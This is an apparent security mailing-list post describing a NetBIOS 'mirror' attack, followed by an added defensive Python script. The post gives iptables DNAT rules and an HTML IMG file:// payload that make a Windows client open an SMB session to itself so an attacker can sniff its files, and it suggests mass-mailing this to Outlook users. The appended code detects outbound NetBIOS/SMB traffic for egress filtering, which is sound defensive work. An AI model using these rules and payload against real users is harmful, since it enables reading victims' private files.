Hi all,

Last night I was debugging a NetBIOS connection between two machines and I remembered something really simple and "stupid". I can't recall reading anything on the subject, but the fact is I didn't do any kind of research, so sorry if this is a known issue.

Mirroring NetBIOS connections from Windows clients

Lacking a better term, I'm calling this "mirror" because the idea is to put a Windows client talking NetBIOS with itself. I've prepared a simple iptables-based firewall on a Linux box, so that, 10.10.10.1 being the firewall's external interface and 10.10.10.2 the Windows client, these simple rules apply:

    -A PREROUTING -t nat -s 10.10.10.2 -d 10.10.10.1 -p tcp -m tcp --dport 139 -j DNAT --to-destination 10.10.10.2:139
    -A POSTROUTING -t nat -o eth0 -j MASQUERADE

Basically, what this does (obviously) is "mirror" the connections to port 139 of the firewall from the Windows client to that same port on the Windows client, causing it in fact to be talking NetBIOS with itself. The NetBIOS connection is established and authenticated successfully, which allows me to sniff the (unencrypted) traffic on the Linux box.

So, if the user on the Windows workstation visits a web page on my Linux box that has (for example)

    <IMG SRC="file://10.10.10.1/c$/boot.ini">

he will in fact be reading his own "boot.ini", and I will be able to read it too by dumping the port 139 traffic on my firewall.

Now, this sounds really simple and "stupid", and of course there's a strong possibility that I'm looking at this from a totally wrong perspective; if so, I am sorry. But doesn't this look like it allows me to send an HTML mail to 10000 Windows/Outlook users and use this to read arbitrary files on their workstations (either by looking at the traffic, or by coding a simple program that parses the NetBIOS traffic)?

Best regards,
Joao Gouveia
------------
tharbad@kaotik.org
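The trick described in the post depends on one thing the workstation's network is expected to prevent: an internal client opening a NetBIOS session (TCP 139, or SMB on 445) to an address outside the trusted network, which is where the firewall that redirects the session sits in the mass-mail scenario. The following is an added example (not part of the original post, and not the author's code) of the egress check a defender would run over flow records to catch exactly that. The flow-log format, the trusted address ranges and the sample lines are all constructed for the example; the 203.0.113.0/24 and 198.51.100.0/24 addresses are documentation ranges standing in for "somewhere on the Internet".

```python
"""Egress check for NetBIOS/SMB sessions leaving the internal network.

Added example: the "mirror" DNAT in the post only works if the workstation is
allowed to reach port 139 on the redirecting host. The standard mitigation is
to block, and alert on, outbound NetBIOS/SMB that is not aimed at internal
servers. Flow records, networks and the log format are constructed here.
"""
import ipaddress
from dataclasses import dataclass

# (protocol, port) pairs used by NetBIOS name/datagram/session service and
# direct-hosted SMB. All of them should stay inside the perimeter.
NETBIOS_SMB_SERVICES = {("tcp", 139), ("tcp", 445), ("udp", 137), ("udp", 138)}

# Assumed trusted address space (constructed); a real deployment loads this
# from the firewall or IPAM instead of hard-coding it.
INTERNAL_NETS = [ipaddress.ip_network("10.10.10.0/24"),
                 ipaddress.ip_network("192.168.0.0/16")]


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str
    dport: int


def is_internal(addr: str) -> bool:
    """True when the address falls inside one of the trusted networks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def parse_flow(line: str) -> Flow:
    """Parse one constructed flow-log line: '<src> <dst> <proto> <dport>'."""
    src, dst, proto, dport = line.split()
    return Flow(src, dst, proto.lower(), int(dport))


def is_smb_egress(flow: Flow) -> bool:
    """True when an internal host talks NetBIOS/SMB to a non-internal address."""
    return ((flow.proto, flow.dport) in NETBIOS_SMB_SERVICES
            and is_internal(flow.src)
            and not is_internal(flow.dst))


def find_smb_egress(lines):
    """Return the flows an egress policy should have dropped (and alerted on)."""
    return [f for f in map(parse_flow, lines) if is_smb_egress(f)]


# Constructed sample: a workstation reaching an external host on 139 (the
# situation the post relies on), next to benign internal SMB and web traffic.
SAMPLE_LOG = """\
10.10.10.2 203.0.113.7 tcp 139
10.10.10.2 10.10.10.5 tcp 445
10.10.10.2 203.0.113.7 tcp 80
192.168.1.20 198.51.100.9 tcp 445
10.10.10.2 203.0.113.7 udp 137
""".splitlines()

if __name__ == "__main__":
    for f in find_smb_egress(SAMPLE_LOG):
        print(f"ALERT outbound NetBIOS/SMB: {f.src} -> {f.dst}:{f.dport}/{f.proto}")
```

Running it prints three alerts: the two TCP sessions to 139 and 445 on external hosts and the UDP 137 name query, while internal SMB and the port 80 connection pass. The same decision, expressed as a default-deny rule for these ports on the perimeter, is what takes the file:// link in an HTML mail from "reads the user's files" down to a failed connection attempt.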